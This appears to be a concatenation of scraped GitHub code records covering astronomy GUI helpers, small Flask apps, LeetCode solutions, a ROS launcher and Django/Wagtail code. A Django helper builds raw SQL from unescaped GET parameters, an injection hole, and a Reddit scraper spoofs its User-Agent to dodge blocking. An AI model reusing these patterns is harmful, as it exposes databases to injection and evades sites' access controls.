use_tra_gp_rot_params(self):\n\n use_tra_gp_rot_params = [\n self.use_tra_GP_rot_kernel_Amp,\n self.use_tra_GP_rot_kernel_time_sc,\n self.use_tra_GP_rot_kernel_Per,\n self.use_tra_GP_rot_kernel_fact\n ]\n\n return use_tra_gp_rot_params\n\n\n\ndef tra_gp_sho_params(self):\n\n tra_gp_sho_params = [\n self.tra_GP_sho_kernel_S,\n self.tra_GP_sho_kernel_Q,\n self.tra_GP_sho_kernel_omega]\n\n return tra_gp_sho_params\n\ndef use_tra_gp_sho_params(self):\n\n use_tra_gp_sho_params = [\n self.use_tra_GP_sho_kernel_S,\n self.use_tra_GP_sho_kernel_Q,\n self.use_tra_GP_sho_kernel_omega]\n\n return use_tra_gp_sho_params\n\n\n################ labels ##########################\n\ndef param_a_gui(self): \n\n param_a_gui = [\n self.label_a1, 
self.label_a2, self.label_a3, \n self.label_a4, self.label_a5, self.label_a6, \n self.label_a7, self.label_a8, self.label_a9\n ]\n\n return param_a_gui\n\ndef param_mass_gui(self):\n\n param_mass_gui = [\n self.label_mass1, self.label_mass2, self.label_mass3, \n self.label_mass4, self.label_mass5, self.label_mass6, \n self.label_mass7, self.label_mass8, self.label_mass9\n ]\n\n return param_mass_gui\n\n\ndef param_t_peri_gui(self): \n\n param_t_peri_gui = [\n self.label_t_peri1, self.label_t_peri2, self.label_t_peri3, \n self.label_t_peri4, self.label_t_peri5, self.label_t_peri6, \n self.label_t_peri7, self.label_t_peri8, self.label_t_peri9\n ]\n\n return param_t_peri_gui\n\n\ndef planet_checked_gui(self): \n\n planet_checked_gui = [\n self.use_Planet1,self.use_Planet2,self.use_Planet3,\n self.use_Planet4,self.use_Planet5,self.use_Planet6,\n self.use_Planet7,self.use_Planet8,self.use_Planet9\n ]\n\n return planet_checked_gui\n\n\n\n \n\ndef add_rv_error(self): \n add_rv_error = [\n [self.inflate_RV_sigma_1,self.use_inflate_RV_sigma_1],[self.inflate_RV_sigma_2,self.use_inflate_RV_sigma_2],\n [self.inflate_RV_sigma_3,self.use_inflate_RV_sigma_3],[self.inflate_RV_sigma_4,self.use_inflate_RV_sigma_4],\n [self.inflate_RV_sigma_5,self.use_inflate_RV_sigma_5],[self.inflate_RV_sigma_6,self.use_inflate_RV_sigma_6],\n [self.inflate_RV_sigma_7,self.use_inflate_RV_sigma_7],[self.inflate_RV_sigma_8,self.use_inflate_RV_sigma_8],\n [self.inflate_RV_sigma_9,self.use_inflate_RV_sigma_9],[self.inflate_RV_sigma_10,self.use_inflate_RV_sigma_10]\n ]\n \n return add_rv_error\n\n\n\n######################### Arb N-body #################################\n \ndef arb_param_gui(self): \n\n arb_param_gui = [\n self.arb_K_1, self.arb_P_1, self.arb_e_1, self.arb_om_1, self.arb_ma_1, self.arb_incl_1, self.arb_Om_1,\n self.arb_K_2, self.arb_P_2, self.arb_e_2, self.arb_om_2, self.arb_ma_2, self.arb_incl_2, self.arb_Om_2,\n self.arb_K_3, self.arb_P_3, self.arb_e_3, self.arb_om_3, self.arb_ma_3, self.arb_incl_3, self.arb_Om_3,\n self.arb_K_4, self.arb_P_4, self.arb_e_4, self.arb_om_4, self.arb_ma_4, self.arb_incl_4, self.arb_Om_4, \n self.arb_K_5, self.arb_P_5, self.arb_e_5, self.arb_om_5, self.arb_ma_5, self.arb_incl_5, self.arb_Om_5,\n self.arb_K_6, self.arb_P_6, self.arb_e_6, self.arb_om_6, self.arb_ma_6, self.arb_incl_6, self.arb_Om_6,\n self.arb_K_7, self.arb_P_7, self.arb_e_7, self.arb_om_7, self.arb_ma_7, self.arb_incl_7, self.arb_Om_7, \n self.arb_K_8, self.arb_P_8, self.arb_e_8, self.arb_om_8, self.arb_ma_8, self.arb_incl_8, self.arb_Om_8,\n self.arb_K_9, self.arb_P_9, self.arb_e_9, self.arb_om_9, self.arb_ma_9, self.arb_incl_9, self.arb_Om_9,\n ]\n return arb_param_gui\n\n\ndef arb_param_gui_use(self): \n arb_param_gui_use = [\n self.use_arb_Planet_1,self.use_arb_Planet_2,self.use_arb_Planet_3,\n self.use_arb_Planet_4,self.use_arb_Planet_5,self.use_arb_Planet_6,\n self.use_arb_Planet_7,self.use_arb_Planet_8,self.use_arb_Planet_9\n ]\n \n return arb_param_gui_use\n\n\n\n\ndef ttv_data_to_planet(self): \n \n ttv_data_to_planet = [\n self.ttv_data_planet_1,self.ttv_data_planet_2,self.ttv_data_planet_3,self.ttv_data_planet_4,self.ttv_data_planet_5,\n self.ttv_data_planet_6,self.ttv_data_planet_7,self.ttv_data_planet_8,self.ttv_data_planet_9,self.ttv_data_planet_10,\n ]\n \n return ttv_data_to_planet\n\n\ndef use_ttv_data_to_planet(self): \n \n use_ttv_data_to_planet = [\n self.use_ttv_data_1,self.use_ttv_data_2,self.use_ttv_data_3,self.use_ttv_data_4,self.use_ttv_data_5,\n 
self.use_ttv_data_6,self.use_ttv_data_7,self.use_ttv_data_8,self.use_ttv_data_9,self.use_ttv_data_10,\n ]\n \n return use_ttv_data_to_planet\n","repo_name":"hmtabernero/exostriker","sub_path":"lib/gui_groups.py","file_name":"gui_groups.py","file_ext":"py","file_size_in_byte":34837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"10840932148","text":"import requests\nfrom flask import Flask, render_template, request\nfrom source import myfunc\nimport operator\n\"\"\"\nWhen you try to scrape reddit make sure to send the 'headers' on your request.\nReddit blocks scrappers so we have to include these headers to make reddit think\nthat we are a normal computer and not a python script.\nHow to use: requests.get(url, headers=headers)\n\"\"\"\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}\n\n\n\"\"\"\nAll subreddits have the same url:\ni.e : https://reddit.com/r/javascript\nYou can add more subreddits to the list, just make sure they exist.\nTo make a request, use this url:\nhttps://www.reddit.com/r/{subreddit}/top/?t=month\nThis will give you the top posts in per month.\n\"\"\"\n\nsubreddits = [\n \"javascript\",\n \"reactjs\",\n \"reactnative\",\n \"programming\",\n \"css\",\n \"golang\",\n \"flutter\",\n \"rust\",\n \"django\"\n]\n\n\napp = Flask(\"DayEleven\")\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/read\")\ndef find():\n read_list=[]\n name_list =[]\n word = request.args\n for a in subreddits:\n if a in word:\n name_list.append(a)\n read_list= myfunc(word)\n sort_list = sorted(read_list, key =(lambda x: x['vote']),reverse=True)\n return render_template(\"read.html\", sort_list = sort_list,name_list = name_list)\n\napp.run(host=\"0.0.0.0\")","repo_name":"cheonjiwan/python_challenge","sub_path":"assignment/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15568088142","text":"import numpy as np\nfrom numpy.core.fromnumeric import sort\nimport torch\nimport PIL \nimport io, base64\nimport torch.nn as nn\nfrom itertools import islice\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\n\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\nclass CLF(nn.Module):\n def __init__(self):\n super(CLF,self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, training=self.training)\n x = self.fc2(x)\n return x\n\ndef url_prediction(url):\n im = Image.open(io.BytesIO(base64.b64decode(url.split(',')[1])))\n img = 255- np.array(im.convert(\"L\").resize((28,28)))\n model = CLF()\n model.load_state_dict(torch.load(\"model_weights.pth\"))\n img_t = torch.from_numpy(img).unsqueeze(dim=0).unsqueeze(dim=0).type(torch.float32)\n model.eval()\n prediction = model(img_t)\n prediction_a = {}\n for i in range(len(prediction[0])):\n prediction_a[i] = round(prediction[0][i].item(),3)\n # 
prediction_a.append(round(prediction[0][i].item(),3))\n return prediction_a\n\n\napp = Flask(__name__)\nCORS(app)\ncors = CORS(app,resources={\n r\"/*\":{\n \"origins\":\"localhost\"\n }\n})\n# @cross_origin(origin='http://localhost')\n# app.config['CORS_HEADERS'] = 'Content-Type', \"\"\n\n\n@app.route(\"/\",methods=[\"POST\"])\ndef index():\n temp = request.json.get(\"url\")\n preds = url_prediction(temp)\n sorted_preds = dict(sorted(preds.items(), key=lambda item: item[1],reverse=True))\n print(sorted_preds)\n # response = jsonify(message=\"Simple server is running\")\n # response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n top = max(sorted_preds, key=sorted_preds.get)\n return str(top)\n\nif __name__ ==\"__main__\":\n app.run(debug=True)\n\n","repo_name":"hasan-farooq/Digit-Recognizer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2847298623","text":"\n# Qus:https://leetcode.com/problems/set-matrix-zeroes/\n\n# --this solution is using extra O(n+m) space\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n\n # with using O(n+m) space\n\n r = set()\n c = set()\n\n n = len(matrix)\n m = len(matrix[0])\n\n for i in range(n):\n for j in range(m):\n if(matrix[i][j] == 0):\n r.add(i)\n c.add(j)\n\n for i in range(n):\n for j in range(m):\n # if any of cur row or col in r or c respectively then make that #elemnt zero\n if(i in r or j in c):\n matrix[i][j] = 0\n\n # print matrix\n\n\n# solution 2 without using extra space\n# solution with constant space and O(n*m*(n+m)) time complexity\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n m = len(matrix[0])\n\n def expend(i, j, d=None):\n\n if(i < 0 or i >= n or j < 0 or j >= m):\n return\n # dont override elemnt which is already 0 as we also\n # need to make its row and col elemnts zero\n if(matrix[i][j] != 0):\n # set that position with the val which is not possible for this #matrix\n matrix[i][j] = None\n\n if(d == None):\n # direct are like left,bottom,right,top (1,2,3,4)\n expend(i, j-1, 1)\n expend(i, j+1, 3)\n expend(i-1, j, 4)\n expend(i+1, j, 2)\n elif(d == 1):\n # expend in left direction\n expend(i, j-1, 1)\n elif(d == 3):\n # expend in right direction\n expend(i, j+1, 3)\n elif(d == 2):\n # expend in bottom direction\n expend(i+1, j, 2)\n else:\n # expend in top direction\n expend(i-1, j, 4)\n\n for i in range(n):\n for j in range(m):\n if(matrix[i][j] == 0):\n expend(i, j)\n #print matrix\n # turn all the none value as 0\n for i in range(n):\n for j in range(m):\n if(matrix[i][j] == None):\n matrix[i][j] = 0\n\n\n# optimize it further to O(n*m)\n\n# solution with constant space and O(n*m*(n+m)) time complexity\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n m = len(matrix[0])\n\n # we are using this variable because for first row and col\n # there is only one pos so we will use this new variable to store first col\n # True if need first col updation\n col1 = False\n\n # update first row and first col for respective cell if any of matrix[i][j]==0\n\n for i in 
range(n):\n\n # update col1 value if first column cell value is 0\n if(matrix[i][0] == 0):\n col1 = True\n\n for j in range(1, m):\n if(matrix[i][j] == 0):\n matrix[i][0] = matrix[0][j] = 0\n\n # update row value based on first cell or col\n # if first row or col is 0 then update that cell value to 0\n\n for i in range(1, n):\n\n for j in range(1, m):\n if(matrix[i][0] == 0 or matrix[0][j] == 0):\n\n matrix[i][j] = 0\n\n # handle first row\n if(matrix[0][0] == 0):\n for j in range(m):\n matrix[0][j] = 0\n\n # hande first col\n if(col1):\n for i in range(n):\n matrix[i][0] = 0\n","repo_name":"mohitsinghnegi1/CodingQuestions","sub_path":"PlacementSeries/SetMatrixZero.py","file_name":"SetMatrixZero.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"1417738477","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\nDescription: \nAuthor: yangyuxiang\nDate: 2021-04-21 23:17:04\nLastEditors: yangyuxiang\nLastEditTime: 2021-04-21 23:18:54\nFilePath: /leetcode/141.环形链表.py\n'''\n#\n# @lc app=leetcode.cn id=141 lang=python\n#\n# [141] 环形链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def hasCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n fast = slow = head\n\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n\n return False\n \n \n \n# @lc code=end\n\n","repo_name":"yangyuxiang1996/leetcode","sub_path":"141.环形链表.py","file_name":"141.环形链表.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"23113403547","text":"#! 
/usr/bin/env python\n\nimport rospy\nimport roslaunch\nimport std_msgs.msg\nimport std_srvs.srv\n\n\nlaunched = False\nrequestedMode = None\nlaunchRequested = False\nstopRequested = False\n\n\ndef barcode_callback(msg):\n global launched\n global launchRequested\n global stopRequested\n global requestedMode\n\n message = msg.data.lower()\n if not (message in ['qualification_simple', 'qualification_vision', 'demo', 'stop']\n or message.startswith('missions')):\n rospy.logerr('Unknown messages')\n return\n\n if message == 'stop':\n if not launched:\n rospy.logwarn('Not launched yet')\n return\n if stopRequested:\n rospy.logwarn('Stop is already requested')\n return\n stopRequested = True\n return\n\n if launched:\n rospy.logwarn('Already launched')\n return\n if launchRequested:\n rospy.logwarn('Launch is already requested')\n return\n\n requestedMode = message\n launchRequested = True\n\n\ndef stop_notification_callback(req):\n global stopRequested\n stopRequested = True\n return std_srvs.srv.TriggerResponse(True, 'OK')\n\ndef main():\n global launched\n global launchRequested\n global stopRequested\n global requestedMode\n\n rospy.init_node('qr_trigger')\n\n launch = None\n\n rospy.Subscriber('/barcode', std_msgs.msg.String, barcode_callback)\n rospy.Service('global_fsm_finished', std_srvs.srv.Trigger, stop_notification_callback)\n\n rate = rospy.Rate(10)\n\n while not rospy.is_shutdown():\n\n if launchRequested:\n\n if requestedMode in ['qualification_simple', 'qualification_vision', 'demo', 'stop']:\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [\"/home/nvidia/AUV/src/auv_startup/launch/\" +\n requestedMode + \".launch\"])\n rospy.loginfo('Starting launch mode ' + requestedMode)\n launch.start()\n launched = True\n launchRequested = False\n else:\n\n if requestedMode.count(':') == 1:\n mode = requestedMode[:requestedMode.index(':')]\n gate_fsm_mode = requestedMode[requestedMode.index(':')+1:]\n rospy.set_param('/gateFsmMode', gate_fsm_mode)\n\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [\"/home/nvidia/AUV/src/auv_startup/launch/\" +\n mode + \".launch\"])\n rospy.loginfo('Starting launch mode ' + mode)\n rospy.loginfo('Gate FSM mode ' + gate_fsm_mode)\n launch.start()\n launched = True\n launchRequested = False\n else:\n mode = requestedMode[:requestedMode.index(':')]\n gate_fsm_mode = requestedMode[requestedMode.index(':')+1:requestedMode.rfind(':')]\n rospy.set_param('/gateFsmMode', gate_fsm_mode)\n\n drums_enabled = requestedMode[requestedMode.rfind(':')+1:]\n rospy.set_param('/drumsEnabled', drums_enabled)\n\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [\"/home/nvidia/AUV/src/auv_startup/launch/\" +\n mode + \".launch\"])\n rospy.loginfo('Starting launch mode ' + mode)\n rospy.loginfo('Gate FSM mode ' + str(gate_fsm_mode))\n rospy.loginfo('Drums enabled ' + str(drums_enabled))\n launch.start()\n launched = True\n launchRequested = False\n\n\n elif stopRequested:\n rospy.loginfo('Shutting down launch config...')\n launch.shutdown()\n launched = False\n stopRequested = False\n\n rate.sleep()\n\n\n\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n 
pass\n","repo_name":"hydronautics-team/AUV","sub_path":"src/auv_startup/scripts/qr_trigger.py","file_name":"qr_trigger.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"14381539806","text":"from typing import List\n\nfrom django.utils.text import slugify\nfrom django.db import models\nfrom wagtail.admin.panels import FieldPanel, MultiFieldPanel\nfrom wagtail.contrib.settings.models import BaseSetting\nfrom wagtail.contrib.settings.registry import register_setting\nfrom wagtail.core.models import Page, TranslatableMixin\nfrom wagtail.documents.models import Document\nfrom wagtail.images.models import Image, AbstractImage, AbstractRendition\n\nfrom mangmap.models.utils import FreeBodyField\n\n\nclass CustomImage(AbstractImage):\n caption = models.TextField(verbose_name=\"Légende et/ou Copyright\", blank=True)\n\n admin_form_fields = Image.admin_form_fields + (\"caption\",)\n\n\nclass CustomRendition(AbstractRendition):\n image = models.ForeignKey(\n CustomImage, on_delete=models.CASCADE, related_name=\"renditions\"\n )\n\n class Meta:\n unique_together = ((\"image\", \"filter_spec\", \"focal_point_key\"),)\n\n\nclass BannerImagePage(Page):\n class Meta:\n abstract = True\n\n banner_image = models.ForeignKey(\n CustomImage,\n verbose_name=\"Bandeau\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n\n content_panels = Page.content_panels + [\n FieldPanel(\"banner_image\"),\n ]\n\n\nclass ContentPage(BannerImagePage, FreeBodyField):\n class Meta:\n verbose_name = \"Page de contenu\"\n verbose_name_plural = \"Pages de contenu\"\n\n subpage_types: List[str] = [\"ContentPage\"]\n\n show_in_footer = models.BooleanField(\n verbose_name=\"Faire apparaître dans le bas de page\",\n default=False,\n help_text=\"Si un lien vers cette page devra \\\n apparaître dans le bas de page\",\n )\n\n content_panels = BannerImagePage.content_panels + FreeBodyField.panels\n\n promote_panels = Page.promote_panels + [\n MultiFieldPanel(\n [\n FieldPanel(\"show_in_footer\"),\n ],\n heading=\"Pour le bas de page du site\",\n ),\n ]\n\n\nclass Tag(models.Model):\n name = models.CharField(verbose_name=\"Nom\", max_length=100)\n slug = models.SlugField(\n verbose_name=\"Slug\",\n max_length=100,\n allow_unicode=True,\n blank=True,\n help_text=\"ce champ est rempli automatiquement s'il est laissé vide\",\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n abstract = True\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super().save(*args, **kwargs)\n\n\nclass SiteType(TranslatableMixin, Tag):\n class Meta(TranslatableMixin.Meta):\n ordering = (\"name\",)\n verbose_name = \"Type de site\"\n verbose_name_plural = \"Types de site\"\n\n\nclass ActualityType(TranslatableMixin, Tag):\n class Meta(TranslatableMixin.Meta):\n ordering = (\"name\",)\n verbose_name = \"Type d'actualité\"\n verbose_name_plural = \"Types d'actualité\"\n\n\nclass Thematic(TranslatableMixin, Tag):\n class Meta(TranslatableMixin.Meta):\n verbose_name = \"Thématique\"\n verbose_name_plural = \"Thématiques\"\n\n icon = models.ForeignKey(Document, on_delete=models.SET_NULL, null=True, blank=True)\n\n @property\n def icon_or_default(self):\n if self.icon:\n return self.icon.url\n else:\n return f\"/static/img/thematics/{self.slug}.svg\"\n\n def to_dict(self):\n to_return = {\"name\": self.name, \"slug\": self.slug, \"icon\": self.icon_or_default}\n\n return 
to_return\n\n\n@register_setting\nclass StructureSettings(BaseSetting):\n plateformUrl = models.URLField(\n verbose_name=\"Lien de la plateforme\",\n max_length=300,\n blank=True,\n null=True,\n )\n\n linkedin = models.URLField(\n help_text=\"URL de votre page LinkedIn\", blank=True, null=True\n )\n\n class Meta:\n verbose_name = \"Paramètre de la structure\"\n\n\n@register_setting\nclass AnalyticsScriptSetting(BaseSetting):\n script = models.TextField(\n help_text=\"Script d'analytics\",\n blank=True,\n null=True,\n )\n\n class Meta:\n verbose_name = \"Script de suivi du traffic\"\n\n\nclass Contact(models.Model):\n firstname = models.CharField(max_length=50)\n email = models.CharField(max_length=50)\n country = models.CharField(max_length=50)\n lastname = models.CharField(max_length=50)\n subject = models.CharField(max_length=40)\n message = models.TextField()\n","repo_name":"TelesCoop/mangroves","sub_path":"mangmap/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"23835722438","text":"import random\nimport fancy_print as fp\ndef stats():\n final=[]\n for i in range(6):\n results=[]\n for i in range(4):\n num=random.randint(1,6)\n results.append(num % 2) # parity of the roll (0 or 1); behaves identically to (num-10)%2\n results.remove(min(results))\n final.append(sum(results))\n return final\n\n\ndef start_game():\n fp.f_print(\"What is your character's name? \")\n player_name=input(\"\")\n player_stats={}\n stat_types=[\"Attack\",\"Defence\",\"Health\",\"Magic Attack\",\"Magic Defence\",\"Hit Chance\"]\n num_choices=stats()\n\n for item in stat_types:\n print_nums=\"\"\n for nums in num_choices:\n print_nums+=str(nums)+\" \"\n fp.f_print(print_nums)\n while True:\n fp.f_print(\"Type which number you would like to use as a bonus to \"+item+\": \")\n selected_num=int(input(\"\"))\n if selected_num in num_choices:\n num_choices.remove(selected_num)\n player_stats[item]=selected_num\n break\n else:\n fp.f_print(\"That number is not available.\")\n return [player_name, player_stats]","repo_name":"AlexRylatt/apcsp-final-project","sub_path":"Player_Start.py","file_name":"Player_Start.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"506909860","text":"\"\"\"\nDjango utils for Serialization\n\"\"\"\n\n\ndef tbl_serialize(model, dataType, filterQ=None):\n \"\"\"\n Serialize Data in Database Table\n \"\"\"\n \n from django.core.serializers import serialize\n from glass.pys import __import\n \n app_mdl = model.split('_')\n app, mdl = app_mdl[0], '_'.join(app_mdl[1:])\n djgMdl = __import('{}.models.{}'.format(app, mdl))\n \n dataType = 'geojson' if dataType == 'gjson' or dataType == 'geojson' \\\n else 'json'\n \n if filterQ:\n data = serialize(dataType, djgMdl.objects.filter(**filterQ))\n else:\n data = serialize(dataType, djgMdl.objects.all())\n \n return data\n
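\n# Usage sketch ('blog_post' is a hypothetical '<app>_<model>' name used purely\n# for illustration of how tbl_serialize is meant to be called):\n#\n# gjson = tbl_serialize('blog_post', 'gjson', filterQ={'published': True})\n# with open('/tmp/posts.geojson', 'w') as out:\n# out.write(gjson)\n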
\n\ndef serialize_by_getParam(request, dtype, table):\n \"\"\"\n Parse any type of data from the Django Database to a Json Object\n \"\"\"\n \n from django.core.serializers import serialize\n \n from glass.pys import __import\n from glass.webg.djg.mdl.i import get_fieldsTypes\n \n def __getWhrTemplate(t):\n return '{}=\\'{}\\'' if t == str else '{}={}'\n \n appAndModel = table.split('_')\n django_model = __import('{}.models.{}'.format(\n appAndModel[0], '_'.join(appAndModel[1:])\n ))\n \n dataTag = 'geojson' if dtype == 'gjson' or dtype == 'geojson' \\\n else 'json'\n \n # Get Columns name and type\n colsTypes = get_fieldsTypes(django_model)\n colsName = set(colsTypes.keys())\n colsGET = set([str(x) for x in request.GET.keys()])\n colsQuery = list(colsName.intersection(colsGET))\n \n if any(colsQuery):\n # Do a query\n dicQuery = {}\n fldCount = 0\n \n for fld in request.GET.keys():\n if fld != 'logic':\n dicQuery[fld] = request.GET[fld].split('_')\n fldCount += 1\n \n if fldCount and fldCount == 1:\n field = list(dicQuery.keys())[0]\n fld_type = colsTypes[field]\n \n fld_value_template = __getWhrTemplate(fld_type)\n \n whr = ' OR '.join([\n fld_value_template.format(field, v) for v in dicQuery[field]\n ])\n \n elif fldCount and fldCount > 1:\n logic = 'OR' if 'logic' not in request.GET else \\\n request.GET['logic']\n \n for field in dicQuery:\n fld_type = colsTypes[field]\n \n fld_value_template = __getWhrTemplate(fld_type)\n \n # replace the raw values with the rendered clause for this field\n dicQuery[field] = ' OR '.join([\n fld_value_template.format(\n field, x) for x in dicQuery[field]\n ])\n \n __logic = ' {} '.format(logic)\n whr = __logic.join([\n '({})'.format(dicQuery[k]) for k in dicQuery.keys()\n ])\n \n __data = serialize(dataTag, django_model.objects.raw(\n 'SELECT * FROM {} WHERE {}'.format(table, whr)\n ))\n \n else:\n __data = serialize(dataTag, django_model.objects.all())\n \n return __data\n\n\ndef serialize_by_query(model, query, dataType):\n \"\"\"\n Return data extracted from the Django Database using Raw SQL\n Query\n \"\"\"\n \n from django.core.serializers import serialize\n from glass.pys import __import\n \n appAndModel = model.split('_')\n djgModel = __import('{}.models.{}'.format(\n appAndModel[0], '_'.join(appAndModel[1:])\n ))\n \n dataType = 'geojson' if dataType == 'gjson' or dataType == 'geojson' \\\n else 'json'\n \n data = serialize(dataType, djgModel.objects.raw(query))\n \n return data\n\n\ndef mdl_serialize_to_json(model, dataType, filePath, filterQ=None):\n \"\"\"\n Serialize data from Django Database and store it in one file\n \"\"\"\n \n from django.core.serializers import get_serializer\n from glass.pys import __import\n \n # Get Model object\n app_model = model.split('_')\n modelObj = __import('{}.models.{}'.format(\n app_model[0], '_'.join(app_model[1:])\n ))\n \n # Get Serializer for json\n JSON_Serializer = get_serializer(dataType)\n json_serializer = JSON_Serializer()\n \n # Write file with data\n with open(filePath, \"w\") as out:\n json_serializer.serialize(\n modelObj.objects.all() if not filterQ else modelObj.objects.filter(\n **filterQ\n ),\n stream=out\n )\n\n","repo_name":"jasp382/glass","sub_path":"glass/wg/djg/mdl/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"16969814697","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.conf.urls import url, patterns, include\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.contrib import admin\nfrom django.http import HttpResponse\nfrom .views import BookDetailView\n\ndef render_robots(request):\n permission = 'noindex' in settings.ROBOTS_META_TAGS and 'Disallow' or 'Allow'\n return HttpResponse('User-Agent: *\\n%s: /\\n' % permission, content_type='text/plain')\n
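\n# Note: the 'and/or' chain above is the pre-PEP 308 conditional idiom;\n# with modern syntax the same line reads:\n#\n# permission = 'Disallow' if 'noindex' in settings.ROBOTS_META_TAGS else 'Allow'\n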
\n \ni18n_urls = (\n url(r'^admin/', include(admin.site.urls)),\n url(r'^admin/salmonella/', include('salmonella.urls'))\n)\n\n\nurlpatterns = patterns('',\n url(r'^robots\\.txt$', render_robots),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^edw/', include('edw.urls')),\n url(r'^book/(?P<slug>[0-9A-Za-z_.-]+)/$', BookDetailView.as_view(), name=\"book_detail\"),\n )\n\n\nif settings.USE_I18N:\n urlpatterns += i18n_patterns('', *i18n_urls)\nelse:\n urlpatterns += i18n_urls\n\nif settings.DEBUG:\n urlpatterns = patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n url(r'', include('django.contrib.staticfiles.urls')),\n) + urlpatterns\n","repo_name":"infolabs/django-edw","sub_path":"backend/sandbox/sample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"72056946665","text":"import mysql_connector as con\nfrom time import perf_counter\nfrom datetime import datetime\nimport time\nimport os\nimport meta as m\nimport argparse\n\n# TODO: run automations of this script, returning and logging the\n# total time of the inserts and tweaking the buffer size argument\n# based on consistent increases in time.\n# Also: figure out why iterations with same buffersize are wildly different\n# in terms of runtime.\n\ndes = \"\"\"ECO DB Import Tool\"\"\"\n\nparser = argparse.ArgumentParser(description=des,\n formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument('-i',\n '--in_dir',\n type=str,\n help='image input directory')\nparser.add_argument('-q',\n '--q_dir',\n type=str,\n help='image quarantine directory')\nparser.add_argument('-d',\n '--d_dir',\n type=str,\n help='image delete directory')\nparser.add_argument('-c',\n '--cpus',\n type=int,\n help='number of processors')\nparser.add_argument('-b',\n '--buffer_size',\n type=int,\n help='buffer size')\nparser.add_argument('-p',\n '--port',\n type=int,\n help='DB port number')\nargs = parser.parse_args()\n\nif args.in_dir is not None and os.path.exists(args.in_dir):\n in_dir = args.in_dir\nelse:\n raise IOError\nif args.q_dir is not None and os.path.exists(args.q_dir):\n q_dir = args.q_dir\nelse:\n raise IOError\nif args.d_dir is not None and os.path.exists(args.d_dir):\n d_dir = args.d_dir\nelse:\n raise IOError\nif args.cpus is not None:\n cpus = args.cpus\nelse:\n cpus = os.cpu_count()\nif args.buffer_size is not None:\n buffer_size = args.buffer_size\nelse:\n buffer_size = 1\nif args.port is not None:\n port = args.port\nelse:\n port = 3306\n\n\n# Strips the returned meta of 'category' labels in the keys.\ndef cleaned_meta(meta):\n values = []\n for d in meta:\n 